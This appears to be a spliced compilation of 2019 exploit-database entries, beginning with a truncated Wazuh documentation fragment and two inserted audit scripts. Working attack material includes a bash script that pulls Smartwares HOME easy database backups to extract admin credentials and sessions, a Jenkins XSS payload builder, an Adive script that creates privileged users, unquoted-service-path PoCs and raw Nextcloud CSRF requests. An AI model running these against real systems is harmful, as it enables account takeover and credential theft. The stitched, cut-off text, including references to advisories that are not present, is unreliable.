
1. The steps to assign an agent to a group with a specific configuration are as follows. Once the agent has been added to the manager, assign it to a group using the agent_groups tool or the API. The following assigns the agent with ID 002 to the group "test01".

Using agent_groups:

[root@wazuh-manage default]# cd /var/ossec/etc/shared
[root@wazuh-manage shared]# mkdir test01
[root@wazuh-manage shared]# /var/ossec/bin/agen
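Added example, not part of the Wazuh documentation above: the 30-minute keep-alive rule described under "Agent status" applied to a GET /agents reply, which also handles the manager's own entry (it reports the 9999-12-31 sentinel shown above rather than a real keep-alive) and an agent that never checked in. The reply is constructed in the shape shown above but trimmed to the fields this check reads; the "lastKeepAlive" key spelling, the "Never connected" status string and the hosts are assumptions.

```python
import json
from datetime import datetime, timedelta
from typing import Dict

KEEPALIVE_TIMEOUT = timedelta(minutes=30)   # the threshold stated above
MANAGER_SENTINEL = "9999-12-31 23:59:59"    # what the manager's own entry reports
TS_FORMAT = "%Y-%m-%d %H:%M:%S"

# Constructed GET /agents reply (not real API output); key names are assumed.
SAMPLE_RESPONSE = json.dumps({
    "error": 0,
    "data": {
        "totalItems": 4,
        "items": [
            {"id": "000", "name": "wazuh-manage", "ip": "127.0.0.1",
             "status": "Active", "lastKeepAlive": MANAGER_SENTINEL},
            {"id": "001", "name": "agent01", "ip": "10.0.0.11",
             "status": "Active", "lastKeepAlive": "2019-01-22 18:11:46"},
            {"id": "002", "name": "agent02", "ip": "10.0.0.12",
             "status": "Active", "lastKeepAlive": "2019-01-22 17:20:00"},
            {"id": "003", "name": "agent03", "ip": "10.0.0.13",
             "status": "Never connected"},
        ],
    },
})


def classify(item: Dict, now: datetime) -> str:
    """State of one agent entry under the rules described above."""
    last = item.get("lastKeepAlive")
    if last == MANAGER_SENTINEL:
        return "Manager"
    if last is None:
        return "Never connected"            # registered, never checked in
    age = now - datetime.strptime(last, TS_FORMAT)
    return "Disconnected" if age > KEEPALIVE_TIMEOUT else "Active"


def agent_states(response_json: str, now: datetime) -> Dict[str, str]:
    """Map agent id -> computed state; reject a reply that reports an error."""
    reply = json.loads(response_json)
    if reply.get("error", 1) != 0:
        raise RuntimeError(f"API error {reply.get('error')}")
    return {item["id"]: classify(item, now) for item in reply["data"]["items"]}


def stale_agents(response_json: str, now: datetime) -> Dict[str, str]:
    """Agents whose reported status disagrees with the keep-alive rule."""
    reply = json.loads(response_json)
    states = agent_states(response_json, now)
    return {item["id"]: states[item["id"]]
            for item in reply["data"]["items"]
            if states[item["id"]] not in ("Manager", item.get("status"))}


if __name__ == "__main__":
    now = datetime(2019, 1, 22, 18, 12, 0)   # constructed "current" time
    for agent_id, state in agent_states(SAMPLE_RESPONSE, now).items():
        print(agent_id, state)
    print("stale:", stale_agents(SAMPLE_RESPONSE, now))
```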
-
Smartwares HOME easy 1.0.9 - Client-Side Authentication Bypass
# Exploit Title: Smartwares HOME easy 1.0.9 - Client-Side Authentication Bypass
# Author: LiquidWorm
# Date: 2019-11-05
# Vendor: Smartwares
# Product web page: https://www.smartwares.eu
# Affected version: <=1.0.9
# Advisory ID: ZSL-2019-5540
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5540.php
# CVE: N/A

Summary: Home Easy/Smartwares are a range of products designed to remotely control your home using wireless technology. Home Easy/Smartwares is very simple to set up and allows you to operate your electrical equipment like lighting, appliances, heating etc.

Desc: HOME easy suffers from information disclosure and client-side authentication bypass vulnerability through IDOR by navigating to several administrative web pages. This allowed disclosing an SQLite3 database file and location. Other functionalities are also accessible by disabling JavaScript in your browser, bypassing the client-side validation and redirection.

Tested on: Boa/0.94.13

/web-en/task.html
/web-en/action_task.html
/web-en/plan_task.html
/web-en/room.html
/web-en/room_set.html
/web-en/room_set2.html
/web-en/scene.html
/web-en/scene_set.html
/web-en/scene_set2.html
/web-en/system.html
-
Adaware Web Companion version 4.8.2078.3950 - 'WCAssistantService' Unquoted Service Path
# Exploit Title: Adaware Web Companion version 4.8.2078.3950 - 'WCAssistantService' Unquoted Service Path
# Date: 2019-11-06
# Exploit Author: Mariela L Martínez Hdez
# Vendor Homepage: https://webcompanion.com/en/
# Software Link: https://webcompanion.com/en/
# Version: Adaware Web Companion version 4.8.2078.3950
# Tested on: Windows 10 Home (64 bits)

# 1. Description
# Adaware Web Companion version 4.8.2078.3950 service 'WCAssistantService' has an unquoted service path.

# 2. PoC

C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /V "C:\Windows" | findstr /i /V """"
WC Assistant    WCAssistantService    C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe    Auto

C:\>sc qc WCAssistantService
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: WCAssistantService
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : WC Assistant
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem

# 3. Exploit
# A successful attempt would require the local user to be able to insert their code in the system
# root path undetected by the OS or other security applications where it could potentially be executed
# during application startup or reboot. If successful, the local user's code would execute with
# the elevated privileges of the application.
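Added example, not from the Wacom, QNAP or Adaware advisories above: a Python audit of `sc qc` output that flags an unquoted binary path containing spaces, lists the directories whose write permissions then decide whether the service can be hijacked, and emits the quoting fix. It accepts the English and the Spanish `sc qc` labels that those three advisories show; the sample dump is constructed from the Wacom advisory's output, and the Finding/audit helper names are this example's own.

```python
import re
from typing import List, NamedTuple, Tuple


class Finding(NamedTuple):
    service: str
    bin_path: str
    unquoted: bool
    audit_dirs: List[str]    # directories where Windows would look for "<prefix>.exe"
    fixed_bin_path: str      # the same path, quoted the way sc.exe expects


# `sc qc` prints localized labels; the advisories above show the English and
# the Spanish variants, so accept both ([ \t] rather than \s so that a match
# never runs across a line break).
_SERVICE_RE = re.compile(
    r"^[ \t]*(?:SERVICE_NAME|NOMBRE_SERVICIO)[ \t]*:[ \t]*(\S+)", re.M)
_BINPATH_RE = re.compile(
    r"^[ \t]*(?:BINARY_PATH_NAME|NOMBRE_RUTA_BINARIO)[ \t]*:[ \t]*(.+?)[ \t]*$", re.M)


def split_exe_and_args(bin_path: str) -> Tuple[str, str]:
    """Split an unquoted ImagePath after its first '.exe' token; the rest is arguments."""
    m = re.search(r"\.exe(?=\s|$)", bin_path, re.I)
    if not m:
        return bin_path, ""
    return bin_path[:m.end()], bin_path[m.end():]


def analyze_bin_path(bin_path: str) -> Tuple[bool, List[str], str]:
    """Return (unquoted with spaces?, directories to audit, corrected path).

    CreateProcess resolves an unquoted path with spaces by trying each
    space-delimited prefix in turn ('C:\\Program.exe', 'C:\\Program Files.exe',
    ...), so the directory holding each prefix must not be writable by
    unprivileged users for the service to be safe."""
    s = bin_path.strip()
    if s.startswith('"'):
        return False, [], s
    exe, args = split_exe_and_args(s)
    if " " not in exe:
        return False, [], s
    dirs: List[str] = []
    for i, ch in enumerate(exe):
        if ch != " ":
            continue
        prefix = exe[:i]                         # e.g. 'C:\Program'
        d = prefix.rsplit("\\", 1)[0] + "\\"     # directory that prefix lives in
        if d not in dirs:
            dirs.append(d)
    return True, dirs, f'"{exe}"{args}'


def audit_sc_qc(output: str) -> Finding:
    """Parse one `sc qc <service>` dump and analyse its binary path."""
    svc = _SERVICE_RE.search(output)
    bp = _BINPATH_RE.search(output)
    if not svc or not bp:
        raise ValueError("not an `sc qc` dump")
    unquoted, dirs, fixed = analyze_bin_path(bp.group(1))
    return Finding(svc.group(1), bp.group(1), unquoted, dirs, fixed)


def remediation_cmd(f: Finding) -> str:
    """sc.exe command that rewrites the path quoted (inner quotes escaped)."""
    inner = f.fixed_bin_path.replace('"', '\\"')
    return f'sc config {f.service} binPath= "{inner}"'


# Constructed `sc qc` dump modelled on the Spanish-locale output in the Wacom advisory.
SAMPLE_SC_QC = r"""[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: WTabletServicePro
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files\Tablet\Wacom\WTabletServicePro.exe
        NOMBRE_INICIO_SERVICIO: LocalSystem
"""

if __name__ == "__main__":
    f = audit_sc_qc(SAMPLE_SC_QC)
    print(f"{f.service}: unquoted={f.unquoted} audit_dirs={f.audit_dirs}")
    if f.unquoted:
        print(remediation_cmd(f))
```

Besides the quoting fix, the audit_dirs output is the list an administrator should check with icacls for write access by non-administrators; a path without spaces or one already wrapped in quotes yields no findings.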
-
Smartwares HOME easy 1.0.9 - Database Backup Information Disclosure
# Title: Smartwares HOME easy 1.0.9 - Database Backup Information Disclosure
# Author: LiquidWorm
# Date: 2019-11-05
# Vendor: Smartwares
# Product web page: https://www.smartwares.eu
# Affected version: <=1.0.9
# Advisory ID: ZSL-2019-5541
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5541.php
# CVE: N/A

# Summary: Home Easy/Smartwares are a range of products designed to remotely
# control your home using wireless technology. Home Easy/Smartwares is very
# simple to set up and allows you to operate your electrical equipment like
# lighting, appliances, heating etc.
#
# Desc: The home automation solution is vulnerable to unauthenticated database
# backup download and information disclosure vulnerability. This can enable the
# attacker to disclose sensitive and clear-text information resulting in authentication
# bypass, session hijacking and full system control.

#!/bin/bash
#
# ==============================================================================
# root@kali:~/homeeasy# ./he_info.sh http://192.168.1.177:8004
# Target: http://192.168.1.177:8004
# Filename: 192.168.1.177:8004-16072019-db.sqlite
# Username: admin
# Password: s3cr3tP4ssw0rd
# Version: 1.0.9
# Sessions:
# ------------------------------------------------------------------
# * Ft5Mkgr5i9ywVrRH4mAECSaNJkTp5oiC0fpbuIgDIFbE83f3hGGKzIyb3krXHBsy
# * Gcea4Ald4PlVGkOh23mIohGq2Da6h4mX0A8ibkm7by3QSI8TLmuaubrvGABWvWMJ
# * JFU4zpdhuN4RTYgvvAhKQKqnQSvc8MAJ0nMTLYb8F6YzV7WjHe4qYlMH6aSdOlN9
# * VtOqw37a12jPdJH3hJ5E9qrc3I4YY1aU0PmIRkSJecAqMak4TpzTORWIs1zsRInd
# * flR4VjFmDBSiaTmXSYQxf4CdtMT3OQxV0pQ1zwfe98niSI9LIYcO3F2nsUpiDVeH
# * rCfrAvnfnl6BsLjF9FjBoNgPgvqSptcH0i9yMwN3QSDbwNHwu19ROoAVSROamRRk
# ------------------------------------------------------------------
# ==============================================================================

if [ "$#" -ne 1 ]; then
  echo "Usage: $0 http://ip:port"
  exit 0
fi

TARGET=$1
CHECK=$(curl -Is $TARGET/data.dat 2>/dev/null | head -1 | awk -F" " '{print $2}')

if [[ "$?" = "7" ]] || [[ $CHECK != "200" ]]; then
  echo "No juice."
  exit 1
fi

echo "Target: "$TARGET
FNAME=${TARGET:7}-$(date +"%d%m%Y")
curl -s $TARGET/data.dat -o $FNAME-db.sqlite
echo "Filename: $FNAME-db.sqlite"
echo "Username: "$(sqlite3 $FNAME-db.sqlite "select usrname from usr") # default: admin
echo "Password: "$(sqlite3 $FNAME-db.sqlite "select usrpassword from usr") # default: 111111
echo "Version: "$(sqlite3 $FNAME-db.sqlite "select option_value1 from option LIMIT 1 OFFSET 3")
echo -ne "Sessions: \n"
printf "%0.s-" {1..66}
printf "\n"
sqlite3 $FNAME-db.sqlite "select sessionid from sessiontable" | xargs -L1 echo "*"
printf "%0.s-" {1..66} ; printf "\n\n"
-
Jenkins build-metrics plugin 1.3 - 'label' Cross-Site Scripting
# Exploit Title: Jenkins build-metrics plugin 1.3 - 'label' Cross-Site Scripting
# Date: 2019-11-06
# Exploit Author: vesche (Austin Jackson)
# Vendor Homepage: https://plugins.jenkins.io/build-metrics
# Version: Jenkins build-metrics plugin 1.3 and below
# Tested on: Debian 10 (Buster), Jenkins 2.203 (latest 2019-11-05), and build-metrics 1.3
# CVE: CVE-2019-10475
# Write-up: https://github.com/vesche/CVE-2019-10475

#!/usr/bin/env python

import sys
import argparse

VULN_URL = '''{base_url}/plugin/build-metrics/getBuildStats?label={inject}&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search'''


def get_parser():
    parser = argparse.ArgumentParser(description='CVE-2019-10475')
    parser.add_argument('-p', '--port', help='port', default=80, type=int)
    parser.add_argument('-d', '--domain', help='domain', default='localhost', type=str)
    parser.add_argument('-i', '--inject', help='inject', default='<script>alert("CVE-2019-10475")</script>', type=str)
    return parser


def main():
    parser = get_parser()
    args = vars(parser.parse_args())

    port = args['port']
    domain = args['domain']
    inject = args['inject']

    # Build the base URL from the chosen scheme/port
    if port == 80:
        base_url = f'http://{domain}'
    elif port == 443:
        base_url = f'https://{domain}'
    else:
        base_url = f'http://{domain}:{port}'

    build_url = VULN_URL.format(base_url=base_url, inject=inject)
    print(build_url)

    return 0


if __name__ == '__main__':
    sys.exit(main())
-
SolarWinds Kiwi Syslog Server 8.3.52 - 'Kiwi Syslog Server' Unquoted Service Path
# Exploit Title: SolarWinds Kiwi Syslog Server 8.3.52 - 'Kiwi Syslog Server' Unquoted Service Path
# Date: 2019-11-08
# Exploit Author: Carlos A Garcia R
# Vendor Homepage: https://www.kiwisyslog.com/
# Software Link: https://www.kiwisyslog.com/downloads
# Version: 8.3.52
# Tested on: Windows XP Professional Service Pack 3

# Description:
# SolarWinds Kiwi Syslog Server 8.3.52 is an affordable software to manage syslog messages, SNMP traps, and Windows event logs

# PoC:
# C:\>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """

Kiwi Syslog Server    Kiwi Syslog Server    C:\Archivos de programa\Syslogd\Syslogd_Service.exe    Auto

# C:\>sc qc "Kiwi Syslog Server"
[SC] GetServiceConfig SUCCESS

SERVICE_NAME: Kiwi Syslog Server
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Archivos de programa\Syslogd\Syslogd_Service.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Kiwi Syslog Server
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

# Exploit
Using the BINARY_PATH_NAME listed above, an executable named "Archivos.exe" could be placed in "C:\", and it would be executed as the Local System user next time the service was restarted.
-
Adive Framework 2.0.7 - Privilege Escalation
# Exploit Title: Adive Framework 2.0.7 - Privilege Escalation
# Date: 2019-08-02
# Exploit Author: Pablo Santiago
# Vendor Homepage: https://www.adive.es/
# Software Link: https://github.com/ferdinandmartin/adive-php7
# Version: 2.0.7
# Tested on: Windows 10
# CVE : CVE-2019-14347

#Exploit
import requests
import sys

session = requests.Session()

# Route traffic through a local intercepting proxy (Burp)
http_proxy = "http://127.0.0.1:8080"
https_proxy = "https://127.0.0.1:8080"
proxyDict = {
    "http": http_proxy,
    "https": https_proxy
}

print('[*****************************************]')
print('[ BYPASSING Adive Framework Version.2.0.5 ]')
print('[*****************************************]''\n')
print('[+]Login with the correct credentials:' '\n')
user = input('[+]user:')
password = input('[+]password:')
print('\n')
url = 'http://localhost/adive/admin/login'
values = {'user': user, 'password': password, }
r = session.post(url, data=values, proxies=proxyDict)
cookie = session.cookies.get_dict()['PHPSESSID']
print('Your session cookie is:' + cookie + '\n')
host = sys.argv[1]
print('Create the new user:')
userName = input('[+]User:')
userUsername = input('[+]UserName:')
password = input('[+]Password:')
password2 = input('[+]Confirm Password:')
print('The possibles permission are: 1: Administrator, 2: Developer, 3:Editor')
permission = input('[+]permission:')
if (password == password2):
    #configure proxy burp
    #make the request that creates the user
    data = {
        'userName': userName,
        'userUsername': userUsername,
        'pass': password,
        'cpass': password2,
        'permission': permission,
    }
    headers = {
        'Cookie': 'PHPSESSID=' + cookie
    }
    request = session.post(host + '/adive/admin/user/add', data=data, headers=headers, proxies=proxyDict)
    print('+--------------------------------------------------+')
else:
    print('Passwords dont match!!!')

#PoC
https://imgur.com/dUgLYi6
https://hackpuntes.com/wp-content/uploads/2019/08/ex.gif
-
Nextcloud 17 - Cross-Site Request Forgery
# Exploit Title: Nextcloud 17 - Cross-Site Request Forgery
# Date: 08.11.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: https://nextcloud.com
# Software Link: https://nextcloud.com/install/#instructions-server
# Version: 17
# CVE: N/A

#Nextcloud offers the industry-leading, on-premises content collaboration platform.
#Our technology combines the convenience and ease of use of consumer-grade solutions like Dropbox and Google Drive with the security, privacy and control business
#needs.

##################################################################################################################################

# CSRF1
# Create Folder

MKCOL /remote.php/dav/files/ogoker/test HTTP/1.1
Host: 192.168.2.109
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
requesttoken: NBxrV688w2KBVFx/Q+X7LsYUMGKGrj5PFNLDVe5R0bo=:ZXkTEoBkskmuOhU0NN2iab9welrLxlUkZqePH70zg/M=
Connection: close
Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp; oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t; __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; nc_username=ogoker; nc_token=BnzwpedGNoSh8RqQEcU7yAbb6O%2FQReCM; nc_session_id=6kkh1f4s3gu80pjk9iclagoqrp; redirect=1; testing=1

##################################################################################################################################

# CSRF2
# Delete Folder

DELETE /remote.php/dav/files/ogoker/test HTTP/1.1
Host: 192.168.2.109
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
requesttoken: NBxrV688w2KBVFx/Q+X7LsYUMGKGrj5PFNLDVe5R0bo=:ZXkTEoBkskmuOhU0NN2iab9welrLxlUkZqePH70zg/M=
Connection: close
Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp; oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t; __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; nc_username=ogoker; nc_token=BnzwpedGNoSh8RqQEcU7yAbb6O%2FQReCM; nc_session_id=6kkh1f4s3gu80pjk9iclagoqrp; redirect=1; testing=1

##################################################################################################################################

# CSRF3
# Create User

POST /ocs/v2.php/cloud/users HTTP/1.1
Host: 192.168.2.109
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
requesttoken: qmO6/Dw6+bFv8FXRaFdzbhhzcVHZIGBHtg5riOIp4es=:+wbCuRNiiJpAnhyaH28qKWEXO2mUSAssxHsnwrFLs6I=
Content-Length: 129
Connection: close
Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp; oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t; __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; nc_username=ogoker; nc_token=BnzwpedGNoSh8RqQEcU7yAbb6O%2FQReCM; nc_session_id=6kkh1f4s3gu80pjk9iclagoqrp; redirect=1; testing=1

{"userid":"test","password":"test1234","displayName":"","email":"","groups":[],"subadmin":[],"quota":"default","language":"en"}

##################################################################################################################################

# CSRF4
# Delete User

DELETE /ocs/v2.php/cloud/users/test HTTP/1.1
Host: 192.168.2.109
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
requesttoken: qmO6/Dw6+bFv8FXRaFdzbhhzcVHZIGBHtg5riOIp4es=:+wbCuRNiiJpAnhyaH28qKWEXO2mUSAssxHsnwrFLs6I=
Connection: close
Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp; oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t; __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; nc_username=ogoker; nc_token=BnzwpedGNoSh8RqQEcU7yAbb6O%2FQReCM; nc_session_id=6kkh1f4s3gu80pjk9iclagoqrp; redirect=1; testing=1

##################################################################################################################################

# CSRF5
# Disable User

PUT /ocs/v2.php/cloud/users/test/disable HTTP/1.1
Host: 192.168.2.109
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
requesttoken: 3uInmrIiv0aGraTESlGJCzqadH5giusD5iZ/GZwxxEQ=:j4df3516zm2pw+2PPWnQTEP+PkYt4oBolFMzU89Tlg0=
Connection: close
Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp; oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t; __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; nc_username=ogoker; nc_token=BnzwpedGNoSh8RqQEcU7yAbb6O%2FQReCM; nc_session_id=6kkh1f4s3gu80pjk9iclagoqrp; redirect=1; testing=1
Content-Length: 0

##################################################################################################################################

# CSRF6
# Enable User

PUT /ocs/v2.php/cloud/users/test/enable HTTP/1.1
Host: 192.168.2.109
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
requesttoken: 3uInmrIiv0aGraTESlGJCzqadH5giusD5iZ/GZwxxEQ=:j4df3516zm2pw+2PPWnQTEP+PkYt4oBolFMzU89Tlg0=
Connection: close
Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp; oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t; __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; nc_username=ogoker; nc_token=BnzwpedGNoSh8RqQEcU7yAbb6O%2FQReCM; nc_session_id=6kkh1f4s3gu80pjk9iclagoqrp; redirect=1; testing=1
Content-Length: 0

##################################################################################################################################

# CSRF7
# Create Group

POST /ocs/v2.php/cloud/groups HTTP/1.1
Host: 192.168.2.109
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
requesttoken: EjdL6QpK1LpIlTtWYWHqEa3p8UKwRqDbBraFa+WWRbE=:Q1IzrCUSpZFn+3IdFlmzVtSNu3r9LsuwdMPJIbb0F/g=
Content-Length: 18
Connection: close
Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp; oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t; __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; redirect=1; testing=1

{"groupid":"test"}

##################################################################################################################################

# CSRF8
# Delete Group

DELETE /ocs/v2.php/cloud/groups/test HTTP/1.1
Host: 192.168.2.109
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
requesttoken: EjdL6QpK1LpIlTtWYWHqEa3p8UKwRqDbBraFa+WWRbE=:Q1IzrCUSpZFn+3IdFlmzVtSNu3r9LsuwdMPJIbb0F/g=
Connection: close
Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp; oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t; __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; redirect=1; testing=1

##################################################################################################################################

# CSRF9
# Change User Full Name

PUT /settings/users/ogoker/settings HTTP/1.1
Host: 192.168.2.109
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
requesttoken: nvnWCslz6So+9VRA8Vg8043tt1pf1wL/ysi2ak1J6es=:z5yuT+YrmAERmx0LhmBllPSJ/WISv2mUuL36IB4ru6I=
OCS-APIREQUEST: true
X-Requested-With: XMLHttpRequest
Content-Length: 266
Connection: close
Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp; oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t; __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; redirect=1; testing=1

{"displayname":"Ozer Goker","displaynameScope":"contacts","phone":"","phoneScope":"private","email":"","emailScope":"contacts","website":"","websiteScope":"private","twitter":"","twitterScope":"private","address":"","addressScope":"private","avatarScope":"contacts"}

##################################################################################################################################

# CSRF10
# Change User Email

PUT /settings/users/ogoker/settings HTTP/1.1
Host: 192.168.2.109
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
requesttoken: I+6bC+nRvx4TyTudd4pzZrOucr8qlgwe0YE3v13+fOw=:covjTsaJzjU8p3LWALIqIcrKOIdn/md1o/R79Q6cLqU=
OCS-APIREQUEST: true
X-Requested-With: XMLHttpRequest
Content-Length: 271
Connection: close
Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp; oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t; __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; redirect=1; testing=1

